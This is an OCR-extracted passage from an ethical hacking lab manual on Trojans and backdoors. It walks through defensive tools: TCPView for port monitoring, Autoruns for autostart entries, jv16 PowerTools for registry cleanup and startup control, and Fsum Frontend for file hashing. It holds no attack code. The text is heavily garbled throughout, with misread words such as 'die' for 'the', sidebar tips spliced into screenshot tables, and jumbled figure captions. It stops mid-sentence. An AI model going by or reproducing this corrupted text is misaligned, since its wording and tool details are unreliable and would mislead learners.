what it is 111 the lab, but the actual process of connecting to the server and accessing
the processes is same as shown 111 tins lab.

m. TASK 1 Lab Tasks

1. Go to Windows Server 2012 Virtual Machine.
2. Install Tcpview from the location D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPYiew main window appears, with details such as Process, Process
ID, Protocol, Local address. Local Port, Remote Address, and Remote Port.

C E H L ab M an u al P age 470 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

TCPView - Sysinternals:

File Options Process View Help
H a h |
|| Process > PID Protocol Local Address Local Pott
C l dns.exe 1572 TCP win-2n9stosgien domain w fl
T7 dns.exe 1572 TCP WIN-2N9ST0SGL domain V‫׳‬/l
T7 dns.exe 1572 TCP WIN-2N9ST0SGL 49157 Wl
T 7 dns.exe 1572 UDP win-2n9stosgien domain
i - dns.exe 1572 UDP WIN-2N9ST0SGL domain
03 Should delete items that I"7 dns.exe 1572 UDP WIN-2N9ST0SGL 49152
you do not wish to ever i 7‫ ־‬dns.exe 1572 UDP WIN-2N9STOSGL 49153
execute. Do so by choosing i" 7 dns.exe 1572 UDP WIN-2N9ST0SGL 49154
Delete in the Entry menu. IF dns.exe 1572 UDP WIN-2N9STOSGL 49155
Only die currendy selected » dns.exe 1572 UDP WIN-2N9STOSGL 49156
1‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49157
item will be deleted. » 1 dns.exe 1572 UDP WIN-2N9STOSGL 49158
T7 dns.exe 1572 UDP WIN-2N9ST0SGL 49159
r dns.exe 1572 UDP WIN-2N9STOSGI.. 49160
» dns.exe 1572 UDP WIN-2N9STOSGL 49161
T dns.exe 1572 UDP WIN-2N9STOSGL 49162
‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49163
r dns.exe 1572 UDP WIN-2N9ST0SGI.. 49164
‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49165
‫ ׳ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49166
1‫ ־‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49167
1 dns.exe 1572 UDP WIN-2N9ST0SGL 49168
T dns.exe 1572 UDP WIN-2N9STOSGL 49169
• ‫ ו‬dns.exe 1572 UDP WIN-2N9STOSGI.. 49170
• dns.exe 1572 UDP WIN-2N9STOSGL 49171 V 1
< r III >

_____________ ______________ ______________ ______________ _________________ U

FIGURE 8.1: Tcpview Main window

tool perform port monitoring.

TCPView - Sysinternals: I ~ I □ f X
1 File Options Process View Help
y a ‫@ !־‬
Process ' PID Protocol Local Address |Local Port 1R ^
E l svchostexe 385G TCP WIN-2N9ST0SGI.. 5504 Wl
(O svchostexe 892 TCP WIN-2N9STOSGI.. 49153 Wl
E l svchost.exe 960 TCP WIN-2N9STOSGL 49154 Wl
E l svchost.exe 1552 TCP WIN-2N9STOSGL 49159 Wl
E l svchost.exe 2184 TCP WIN-2N9ST0SGL 49161 Wl
E svchost.exe 3440 TCP WIN-2N9STOSGI.. 49163 Wl
E svchost.exe 4312 TCP WIN-2N9ST0SGI.. 49168 Wl
E svchost.exe 4272 TCP WIN-2N9STOSGL 49169 Wl
E svchost.exe 1808 TCP WIN-2N9ST0SGI.. 49187 Wl
1'‫ י‬svchost.exe 1552 UDP win-2n9stosgien bootps
E svchost.exe 1552 UDP win-2n9stosgien bootpc
1' ‫ י‬svchost.exe 9G0 UDP WIN-2N9ST0SGI... isakmp
E svchost.exe 1552 UDP win-2n9stosgien 2535
[□ svchost.exe 3092 UDP WIN-2N9STOSGL 3391
E svchost.exe 960 UDP WIN-2N9ST0SGL teredo
G3 If you are running E svchost.exe 960 UDP WIN-2N9ST0SGI... ipsec-msft
Autoruns without E svchostexe 1064 UDP WIN-2N9STOSGI.. llmnr *
administrative privileges on E svchost.exe 960 UDP win-2n9stosgien 53441 *
Windows Vista and attempt T7 System 4 TCP win-2n9stosgien netbios-ssn Wl
1 ‫ י‬System 4 TCP win-2n9stosgien microsoft-ds wir
to change die state of a
• 1 System 4 TCP win-2n9stosgien microsoft-ds wit
global entry, you'll be denied • ' System 4 TCP WIN-2N9STOSGI... http Wl
access 7‫ יי‬System 4 TCP WIN-2N9STOSGI... https Wl
T7 System 4 TCP WIN-2N9STOSGI... microsoft-ds Wl
• 1 System 4 TCP WIN-2N9STOSGI... 5985 Wl v
III n >

FIGURE 8.2: Tcpview Main window

5. Now it is analyzing die SMTP and odier ports.

C E H L ab M an u al P age 471 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

TCPView - Sysinternals:

File Options Process View Help
y a
“rotocol Local Address Local Port Remote Address Remote Pott Stat
& Autoruns will display a CP WIN-2N9ST0SGL 3388 WIN-2N9ST0SGL 0 LIST
dialog with a button that CP WIN-2N9ST0SGL 5504 WIN-2N9ST0SGL 0 LIST
enables you to re-launch CP WIN-2N9ST0SGL 49153 WIN-2N9ST0SGL 0 LIST
Autoruns with CP WIN-2N9ST0SGL 49154 WIN-2N9ST0SGI.. 0 LIST
administrative rights. You CP WIN-2N9ST0SGL 49161 WIN-2N9ST0SGI.. 0 LIST
can also use the -e CP WIN-2N9ST0SGL 49183 WIN-2N9ST0SGI.. 0 LIST
command-line option to CP WIN-2N9ST0SGL 49168 WIN-2N9ST0SGI.. 0 LIST
launch initially launch CP WIN-2N9ST0SGL 49169 WIN-2N9ST0SGI.. 0 LIST
Autoruns with CP WIN-2N9ST0SGL 49187 WIN-2N9ST0SGI.. 0 LIST
administrative rights DP win-2n9stosgien bootps x *
DP win-2n9stosgien bootpc * ‫יי‬
DP WIN-2N9ST0SGL isakmp ‫יי‬
DP win-2n9stosgien 2535 * ‫יי‬
DP WIN-2N9ST0SGL 3391 * ‫יי‬
DP WIN-2N9ST0SGL teredo ‫יי‬ ‫יי‬
DP WIN-2N9STOSGL ipsecmsft * ‫יי‬
DP WIN-2N9ST0SGL llmnr ‫יי‬ ‫יי‬
DP win-2n9stosgien 53441 ‫יי‬ ‫יי‬
CP win-2n9stosgien netbios-ssn WIN-2N9ST0SGL 0 LIST
CP win-2n9slosgien microsoft-ds win-egbhisgl 410 49158 EST,
CP wirv2n9$tosgien microsoft-ds windows8 49481 EST,
Cl There are several ways to CP WIN-2N9ST0SGL https WIN-2N9ST0SGI.. 0 LIST
get more information about CP WIN-2N9ST0SGL microsoft-ds WIN-2N9ST0SGI.. 0 LIST
. ‫ך‬
an autorun location or entry. < III
To view a location or entry
in Explorer or Regedit
chose Jump To in the Entry
menu or double-click on the FIGURE 8.3: Tcpview analyzing ports
entry or location's line in the
display You can also kill die process by double-clickuig diat respective process, and
dien clicking die End Process button.

Properties fo r dns.exe: 1572

| ‫ך־‬ Domain Name System (DNS) Server

Microsoft Corporation
Version: G.02.8400.0000


End Process


FIGURE 8.4: Killing Processes

1m TASK 2 Go to Windows Server 2012 Virtual Machine.

Autoruns Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8

Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.
It lists all processes. DLLs, and services.

C E H L ab M an u al P age 472 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter.J ~

File Entry O ptions User Help

HijacksImage3 |ExecuteBoot3 |Codecs | ,‫־‬$► Applnit | ,‫־‬V KnownDLLs | A Wriogon

1ft Winsock Provtders ] & Print Monitors | t j j LSA Providers | £ ‫ ־‬Network Providers | 9 . Sidebar Gadgets
O Everything Logon < Explorer | & Internet Explorer | J Scheduled Tasks | Services | Drivers

Autorun Entry Description Publisher Image Path

■}jf HKLM\SOFTWARE\Microsoft\Window$ N T\CurrentVers10n\Winl0g0nl'AppS etup
O You can view Explorer's 0 g ] UsrLogon cmd c:\windows\system32\usrlo...
file properties dialog for an HKLM \S 0 FTWAR E\M croscrft\Wndows\CurrentVers10n\R un
0 [■13HotKeysCmds hkcmd Module Intel Corporation c: \windows\system32\hkc...
entry's image file by
0 £ 3 IgfxT ray igfxTray Module Intel Corporation c:\windows\system32\igfxtr...
choosing Properties in die
0 [■1‫־‬ Persistence persistence Module Intel Corporation c:\windows\system32\igfxp...
Entry menu. You can also $ H KLM\S 0 FTWAR E\W0w6432N ode\M icrosott\Wmdows\CurrentVersion\R un
have Autoruns automatically E Adobe ARM Adobe Reader and Acrobat. .. Adobe Systems Incorporated c:\program files (x86)Vcomm...
execute an Internet search in 0 [■1 Adobe Reader Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:\program files (x86)\adob
your browser by selecting 0 EPS0N_UD_S.. EPSON USB Display V I 40 SEIKO EPSON CORPORA.. c:\program files (x86)\epso...
r‫־‬a r ‫\־‬ . . ■ ^ . T ■ ^ . . ™ .
Search Online in the Entry

Ready Windows Entries Hidden.

FIGURE 8.5: Automns Main Window

& Simply run Autoruns 1 °- following is the detailed list on die Logon tab.
and it shows you die
currendy configured auto- O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
start applications in the I File Entry O ptions User Help
locations that most direcdy d is ) ^ 1 X ^
execute applications.
H Codecs | P Boot Execute | ^ Image Hjacks | [ j ) Applnit | KnownDLLs | ^ Winlogon
Perform a new scan that
fc* Winsock Providers Print Monitors LSA Providers £ Network Providers | Sidebar Gadgets
reflects changes to options
by refreshing die display !3 Everything | Logon ^ Explorer 4$ Internet Explorer '1 Scheduled Tasks | Services ^ Drivers

Autorun Entry Description Publisher Image Path

0 [ij] HotKeysCmds hkcmd Module Intel Corporation c:\windom\system32\hkc...
CQ Internet Explorer This 0 lafxTrav igfxT ray Module Intel Corporation c:\windows\system32\igfxtr
entry shows Browser Helper 0 lil Persistence persistence Module Intel Corporation c:\windows\system32\igfxp .
Objects (BHO's), Internet
Explorer toolbars and S E3 Adobe ARM Adobe Reader and Acrobat. . Adobe Systems Incorporated c:\program files (x86)\comm..
extensions 0 0 Adobe Reader... Adobe Acrobat SpeedLaun... Adobe Systems Incorporated c:\prog1am files (x86)\adob..
0 EPS0N_UD_S. EPSON USB Display V I.40 SEIKO EPSON CORPORA... c:\program files (x86)\epso.
0 9 googletalk Google Tak Google c:\program files (x86)Vgoogl.
0 fH SurvlavaUpdat JavalTM) Update Scheduler Sun Microsystems, Inc. c:\program files |x86)Vcomm
t S C:\ProgramDala\Microsoft\Windows\Start Menu\Progcams\Startup

Ready Windows Entries Hidden

FIGURE 8.9: Autonuis Logon list

11. The following are die Explorer list details.

C E H L ab M an u al P age 473 E th ica l H a c k in g an d C ounterm easures Copyiight © by EC-Council

All Rights Reserved. Reproduction is Stricdy Proliibited.
M od ule 0 6 - T rojans and Backdoors

O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L

File Entry O ptions User Help

| Codecs | 3 Boot Execute | 3 Image H^acks | '■> Applnit | ' KnownDLLs ] A Wnbgon

& Services All Windows Winsock Providers | 1* Print Monitors | LSA Providers | Network Providers | Sidebar Gadgets

services configured to start Z? Everything | ^ Logon[ ,j Explorer £ Internet Explorer | J Scheduled Tasks | Services | Drivers

automatically when the Autorun Entry Desciiption Publisher Image Path

HKLM \S 0 FTWAR E\Classes\Protocois\F*er
system boots. 0 ^ te x t/x m l Microsoft Office XML MIME... Microsoft Corporation c:\pr0gramfiles\c0fnm0n fi..
•iff HKLM \S oftware\Classes\x\S heC xVContextM enuH andlers
0 ^ SnagltMainSh.. Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs..
0 fo‫־‬ WinRAR WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.
H KLM \S 0ftware\W0w6432N ode\Classes\x\S helE x\ContextM enuH andlers
0 SnagltMainSh . Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs..
0 *V WinRAR32 WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.
H KLM \S oftware\Classes\D irectory\S helE xSContextM enuH andlers
0 SnagltMainSh Snagit Shell Extension DLL TechSmith Corporation c:\program files (x8S)\techs.

Ready Windows Entries Hidden.

FIGURE 8.10: Autonins Explorer list

12. The following are die Services list details.

O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
File Entry O ptions User Help

*J & & B X *
H Codecs | ‫־־‬I Boot Execute ] 3 Image hijacks | [ j l Applnit | KnownDLLs | ^ Wintogon
fc?; Winsock Providers | & Print Monitors LSA Providers £ Network Providers 1 Sidebar Gadoets
(33 Drivers This displays all O Everything | ^ Logon | Explow T i Internet Explorer Scheduled Tasks | Services Drivers
kernel-mode drivers
Autorun Entry Description Publisher Image Path
registered on the system g HKLM\System\CurrentControlSet\Services
except those that are 0 [ 1 ‫ י‬AdobeFlashPta This service keeps you Ad... Adobe Systems Incorporated c: \windows\syswow64\ma
disabled 0 [■1 c2wts Service to convert claims b .. Microsoft Corporation c:\program filesNwindows id..
0 0 EMPJJDSA EPSON USB Display V I 40 SEIKO EPSON CORPORA.. c:\program files (x86)\epso...
0 F I M02illaMainten... The Mozia Maintenance S. . Mozila Foundation c:\program files (x86J\m02i ...
0 0ose Savesinstalationfilesused .. Microsoft Corporation c:\program files (x86)\comm
0 F I osoosvc Office Software Protection... Microsoft Corporation c:\program files\common fi
0 H WSusCertServer This service manages the c... Microsoft Corporation c:\program filesVupdate ser

Ready Windows Entries Hidden

FIGURE 8.11: Autoruns Services list

13. The following are die Drivers list details.

C E H L ab M a n u al P age 474 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L

File Entry O ptions User Help

3 Image H^acks |ExecuteBoot! 3 |CodecsH [ ,‫־‬$ Applnit | ,‫־‬V KnownDLLs | A

ft Winsock Providers [ & Print Monroes | $ LSA Providers* | £‫ ־‬Network Providers | Sidebar Gadgets
O Everything | Logon | . < Explorer | ^ Internet Explorer | J Scheduled Tasks | Services Dnvers

£9 Scheduled Autorun Entry Description Publisher Image Path

Tasks Task ^ 3ware | LSI 3ware SCSI Storpoct Driver}SI c: \windows\system32\drrve.

scheduler tasks S) adp94xx( Adaptec Windows SAS/SA... Adaptecjnc. c: \windows\system32\dr1ve.

adpahci ^ Adaptec Windows SATA St.. Adaptec, Inc. c: \ windows\system32\drive.
configured to start adpu320 Adaptec StorPort Ultra320... Adaptecjnc. c: \ window$\system32\dnve.
,‫־‬amdsata 4 AHD 1.2 Device Driver Advanced Micro Devices c: \ windows\system32\dnve.
at boot or logon amdsbs ^ AM D Technology AH Cl Co... AM D Technologies Inc. c: \ windows\system32\drive.
amdxata ^ Storage Filter Driver AdvancedMicroD evices c: \ window$\system32\drive.
Adaptec RAID Storpoct Driver PMC-Sierra, Inc. c: \ windowsSsystem32\drrve.
arcsas & Adaptec SAS RAID W S 0 3 ... PMC-SierraJnc. c: \window$\system32\drrve.

Ready Windows Entries Hidden.

FIGURE 8.12: Autoruns Drivers list.

14. Tlie following is die KnownDLLs list 111 Antonins.

O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L
File Entry O ptions User Help

d j) & B X *
I?• Winsock Providers | ^ Print Monitors | ^ LSA Providers | f Network Providers | 9 • Sidebar Gadgets
O Everythin
Ever/hing ^ Logon | Explorer ] & Internet Explorer ] J Scheduled Tasks 1 Services [ Drivers
Q Codecs Q Boot Execute | f"^ Image Hijacks | [ j | Applnit \ KnownDLLs j Winlogon

Autorun Entry Description Publisher Image Path

ijT HKLM \System\CurrentControlSet\Controf\S ession Manager\KnownDlls
0 13 _W0w64 File not found: C:\Wndows...
0 1‫ר‬ W ow64cpu File not found: C:\Wndows.
0 ■‫י‬ Wow64win File not found: C:\Wndows...

Ready Windows Entries Hidden

FIGURE 8.13: Autoruas Known DLL’s list.

15. Install and launch jv16 PowerTools 111 Windows Server 2012 (host
T A S K 4
16. jvl6 Power Tool is located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
Jv16 Power Tool
17. To launch jv16 PowerTools, select die Start menu by hovering die mouse
cursor on die lower-left corner ot die desktop.

C E H L ab M a n u al P age 475 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

‫י ״‬



■3 Windows Server 2012

Wirdowt Server 2012 Rocate Cancxfatr Caucrnt.
fcvaluator copy. Eud *40.

.. . * J L J L . ‫ל‬ 1
FIGURE 7.1: Windows Server 2012 Start-Desktop

18. Click jv16 PowerTools 2012 111 Start menu apps.

Start A dm inistrator A

03 Winlogon
Notifications Shows DLLs
that register for Winlogon
notification of logon events

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my computer icon.

C] Winsock Providers
Shows registered Winsock
protocols, including
Winsock service providers.
Malware often installs itself
as a Winsock service
provider because there are
few tools diat can remove
them. Autoruns can uninstall
them, but cannot disable

C E H L ab M a n u al P age 476 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

P jvl 6 PowerTools 2012

1 E*e Language lo o k Help

O K r Trad LrnMDon n Effect - 60 days left Live Support: Handbook not

Onlne avadaWe


Registry Tools

‫ו^ד‬ File Tools Fully remove

software and
Speed up my
System Tools
Privacy Tools

— Backups Control which

programs start
Immunize my
Verify my downloads
are safe to a n
Acton Hstory

UJ Settings
Trial Reminder
■ 92<*>
Registry Health

PC Health
jv l6 PowerTools ( runnng on Datacenter Edition (x64) with 7.9 GB o f RAM

[10:29:45 ‫ ־‬Tip]: Your system has now been analyzed. The health score of your computer ts 95 out o f 100 and the
health score o f yoir Wndows regstry 6 92 out o f 100. I f you scored under 100 you can improve! the ratings by
usrtg the Oean and Fa My Computer tool.

FIGURE 8.20: jvl6 Home page.

20. Tlie Clean and fix my computer dialog box appears. Click the Settings tab
and then click die Start button.
jv l 6 PowerTools 2012 [W8-x64] - Clean and fix my computer *

□ Settings Additional
Li 10
Search Ignore words
safety options words

S e ttin g s
Emphasize sa fe ty over both scan speed and the number o f found errors.

Emphasize the number o f found errors and speed over sa fe ty and accuracy.

Selected setting: Normal system scan policy: all W indows-related data is skipped for additional
safety. Only old temp files are listed.


C E H L ab M an u al P age 477 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
(3S LSA Providers Shows
registers Local Security
Authority (LSA)
authentication, notification
M od ule 0 6 - T rojans and Backdoors
and security packages

FIGURE 8.21: jvl6 Clean and fix my computer dialogue.

21. It will analyze your system for tiles; this will take a few minutes.
1-1 jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer! ‫־‬ I‫ם‬P x
File Select Tools Help

‫יג‬ Analyzing your computer. This can
take a few mmutes. Please wait...

‫ ט‬Printer Monitor
Drivers Displays DLLs that
load into the print spooling
service. Malware has used
this support to autostart

FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.

22. Computer items will be listed after die complete analysis.

iv16 PowerTools 2012 rW8-x641 - Clean and fix mv comDuter! ‫־‬ !‫ ם‬r x

LJ You can save die results File Select Tools Help

of a scan with File->Save Item
and load a saved scan widi Severity
File->Load. These Description
commands work with native Tags
Autoruns file formats, but
Item / Seventy Descrpbon Tags
you can use File->Export to .....................
save a text-only version of !3 R e g istry E rrors 7
the scan results. You can
also automate the generation !‫ ־‬I ^ In v a lid file or d ire c to ry re fe re n c e 7
of native Autoruns export
files with command line I ] c ) R e g istry ju n k 266
‫ח‬ ♦J O b so le te so ftw a re e ntry 4

|~1 U se le ss e m pty k e y 146

‫ח‬ ♦J U se le ss file e xte n sio n 116

^ +J S ta rt m enu and d e s k to p items 23

Delete dose
I - II
Selected: 0, h igh lig h ted : 0, to ta l: 296

FIGURE 8.24: jvl6 Clean and fix my computer Items details.

23. Selected item details are as follows.

LJ Sidebar Displays
Windows sidebar gadgets

C E H L ab M an u al P age 478 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer

File Select Tools Help


Item / Seventy Descry to n Tags

13 R e g istry E rrors 7

13 ‫ח‬ In v a lid tile or d ire c to ry re fe re n c e 7

‫כ‬ HKCRUnstall :3 % FJe or directory X : =

1HKCRUnstal Fie or directory 'C:
^ HKLM\softw< 13% Fie or directory X :

_ ] H K L M \s o ttw ;^ B FJe or directory X :

□ HKLM\SOFT\/ 13% File or directory X :
□ HKLM\SOFT\l 13% Fie or directory X :

H Compare the current _ | HKLM\S0ttwi FJe or directory X :

Autoruns display with 13 R e g istry ju n k 266

□ V
previous results that you've
saved. Select File | Compare
and browse to die saved file.
Autoruns will display in Selected: 0, h ig h lig h te d : 0, to ta l: 296

green any new items, which

correspond to entries that FIGURE 8.23: jvl6 Clean and fix my compute! Items.
are not present in the saved
file. Note that it does not 24. The Registry junk section provides details for selected items.
show deleted items
1-‫ י‬jv16 PowerTools 2012 [W8‫־‬x64]~ Clean and fix my computer! ‫־־‬ ‫ם‬ *
File Select Tools Help

[‫־־‬J If you are running Item

Autoruns without Severity
administrative privileges on
Windows Vista and attempt
to change die state of a Item / Severity Description Tags
global entry, you'll be denied _] 3 R e g istry ju n k 266
access. Autoruns will display
a dialog with a button that 3 ‫ח‬ O b so le te s o ftw a re e ntry 4
enables you to re-launch □ HKCUVSoftw 30% Obsolete software e
Autoruns with □ HKCU^oftw 30% Obsolete software {
administrative rights
□ HKUS\S-1-S- 30% Obsolete software ‫ז‬

□ HKUSV1-5- 30% Obsolete software e

□ (3 U se le ss e m pty ke y 146

□ HKCRVaaot | 10% Useless empty key

□ HKCRVaaot 20% Useless empty key
□ HKCRVacrot 20% Useless empty key
‫ח‬ MKCRV.aaot 20% Useless emotv kev

Selected: 0, h ig h lig h te d : 0, tota l: 296

FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.

25. Select all check boxes 111 die item list and click Delete. A dialog box appears.
Click Yes.

— L&S f c s l i l f i f l Page 479 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

Empty Locations selection All Rights Reserved. Reproduction is Stricdy Prohibited.
in die Options menu is
checked Autoruns doesn't
show locations with no
M od ule 0 6 - T rojans and Backdoors

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[

File Select Tools Help

Item Seventy Descnption Tags

0 J
jv16 PowerTools 2012

Y ou are a bo ut to delete a lo t o f erroneous registry data. Using th e Fix

O o p tio n is always th e better o p tio n . Are y o u sure y o u kn o w w h a t yo u are

d o in g and w a n t to proceed?

0 *I S la il m enu a n d d e s k to p item s 23/23

S e le c te d j2 9 ^ h ig h lig h te d ftto ta h 2 9 6

FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.

26. Go to the Home tab, and click die Control which programs start
automatically icon.

C E H L ab M a n u al P age 480 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
UJ The Verify Signatures
option appears in the
Options menu on systems
that support image signing
M od ule 0 6 - T rojans and Backdoors
verification and can result in
Autoruns querying
certificate revocation list
(CRL) web sites to FIGURE 8.28: jvl6 Control which program start automatically.
determine if image
signatures are valid 27. Check programs in Startup manager, and then you can select die
appropriate action.
jv16 PowerTools 2012 [W8-x64] - Startup Manager T Z S
File Select Tools Help

Enabled Process running Yes ‫־‬

System entry No PID 4280

Program )usched.exe Threads 4
C! The Hide Microsoft C: program Files (x86)VCommon 1
Filename Base priority Normal
Entries selection omits Command Ine 'C:\program FJes (x86)\Common Memory usage 9.12 MB
images that have been Loaded from rt<EY_LOCAL,MACHINE \SOFTVV< Page file usage 2.23 MB
signed by Microsoft if Descrption JavaCTM) Update SchecUer File size 246.92 KB
Verify Signatures is Tags
selected and omits images Enabled / Program Descrption Tags
that have Microsoft in their
resource's company name |l 1 F o un d s o ftw a re 10 —
field if Verify Signatures is

■ Yes )usched.exe C:program Files

not selected
□ Yes googletalk.exe Google Talk C: program Files

□ Yes EMP_UO.exe EPSON USB Dispk C:\Program Files =

□ Yes Reader_sl.exe Adobe Acrobat S| C:\program Files

□ Yes AdobeARM.exe Adobe Reader ar1C: program Files

□ Yes 1gfxtray.exe igfxTray Module C:\Windowsteyst

□ Yes hkcmd.exe hkcmd Module C:\W indows^yst
□ Yes 1gfxpers.exe persistence Modi. C:\Windowsfeyst

FIGURE 8.29: jvl6 Startup Manager Dialogue.

28. Click die Registry Tools menu to view registry icons.

f!File Language Tools Help

jv16 PowerTools 2012

I MACECRAFT Trial Urnta bon n Effect - 60 days left Live Support:

Handbook not
>SOFTWARE Online avaiaWe
B3 Use the Hide Microsoft
Entries or Hide Windows
Entries in the Options $
menu to help you identify
software that's been added Registry Tools m
Registry Find Registry
to a system since installation. Manager F^der & Replace Cleaner
Autoruns prefixes the name
of an image's publisher with
"(Not verified)" if it cannot
verify a digital signature for
the file that's trusted by the
System Tools
Regetry Registry Registry
^ Privacy Tools Compactor Information Monitor


Acton Hstory

IU I Settings

100% Trial Reminder

Registry Health
You are using the free trial version o f jv l6 PowerTools. Pick here to buy the
real version'

FIGURE 8.30: jvl6 Registry tools.

29. Click File Tools to view hie icons.

C E H L ab M an u al P age 481 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

EE1 The Hide Windows

Entries omits images signed
by Windows if Verify
Signatures is selected. If
Verify Signatures is not
selected, Hide Windows
Entries omits images that
have Microsoft in their
resource's company name
field and the image resides
beneath the %SystemRoot%

FIGURE 8.31: jvl6 File tools.

30. Click System Tools ro view system icons.

jv16 PowerTools 2012 x
Fite Language Tools Help

I MACECRAFT Trial Untatoon In Effect - 60 days left Live Support:

Handbook not
' SO FTW ARE Online avaiaWe

Registry Tools
Software Startup Start Menu Automation
Unnstaler Manager Tool Tool

!I m■! S ystem Tools

Service System
^ Privacy Tools Manager Optimizer


Action History

IQ I Settings

100% Trial Reminder

Registry Health
You are using the free trial version o f jv l6 PowerTools. Clio- to buy the
real version!
& Tools
demonstrated in
this lab are
available in
D:\CEH- FIGURE 8.32: jvl6 System tools.
Module 06 Trojans
§ a < & d 9 fl» ‫־‬Page 482 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

31. Click Privacy tools to view privacy icon.

jv16 PowerTools 2012
I E*e !,*"Quage 1001* Hdp

1MACECRAFT Trial Lfnitabon in Effect - 60 days left Live Support:

Handbook not
' S O FT W A R E Online avarfable

A Registry Tools
history Disk Wiper
1^ ‫ ך‬Fie Tools

B System Tools


Actjon Hstory

| L lj Settings

3 Trial Reminder
You are usng the free trial version of jv 16 PowerTools. C kk here to buy the
real version ‫י‬

FIGURE 8.33: jvl6 Privacy tools.

32. Click Backups in die menu to display die Backup Tool dialog box.
jv16 PowerTools 2012 T^TeT x T
£Q You can File Language loots Help

compare the MACECRAFT L

current Autoruns O SO FTW ARE
Trial Umitabon in Effect - 60 days left

jv16 PowerTools 2012 [W8‫־‬x64] ‫ ־‬Backup Tool I ~ I

Live Support: Handbook not

x 1
display with £He Select lo o k Help
previous results
that you've saved.
S elect Registry Fie Backups Othef
Backups Backups
File|Compare and
Descnptjon Type Size ID Created
browse to the
saved file. 0 13 File Backups

□ Clean and Data removed 34.6 KB 00062D 21.09.2012,

Autoruns will
display in green
any new items,
which correspond
to entries that are
not present in the
saved file. Note
that it does not Re Sejected^^iighliqhted^^otaM
show deleted
item s

FIGURE 8.34: jvl6 Backup took

C E H L ab M an u al P age 483 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

33. Go to Windows Server 2012 Virtual Machine.

= TASK 5
34. Double-click FsumFrontEnd.exe, the executable tile located at D:\CEH-
Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder
Integrity Checker\Fsum Frontend.
35. The Fsum Frontend main window is shown 111 the following screenshot
Fsum Frontend v l .5.5.1 iz r^ * ‫׳‬
B - Q Fsum Frontend
Tools □ ₪
n M ethods (96)
B - Q Calculate hashe
‫ ח‬adlcrS Q adlcr15 Q adler32 ‫ח‬ ap hash C bdkr
5E= : : ‫ח‬ cfcsum_mp€c2 Q crc8 f ‫־‬l crc16 n crc16_ccitt H I crc16_ibm □ <rc16_125
Tod 2 3 - : ■ ■
Verify checksur 3&■■: □ crcl6_xr‫־>־‬dem □ crcl6_zmodem □ crcM □ crcJZ IZ crc32_br1p2 d crc32jamcrc

*G enerate chec i c1c32_mpcg2 1 i crc.54 O crc64_ecma ( j djb hash d dhoZ35 ( 7 e d o n k cy

Options 0 5 ! n dF32 (_) fletcher8 Q fletcherl 6 Q . fletcher32 CfnvO-22 L f n 1 / ‫י‬ ‫״‬0-64
‫•״״‬ About

lS a .U a Encoding: Bate 16 (hexadecimal)

C ?L og

Web sits htipi.'/fsum fesourcefoi 2 ‫״‬,

& CEH-Tools are FIGURE 8.35: FsumFrontEnd main window.

also located 36. Select the type ot hash that you want; let’s say md5. Check die md5 check
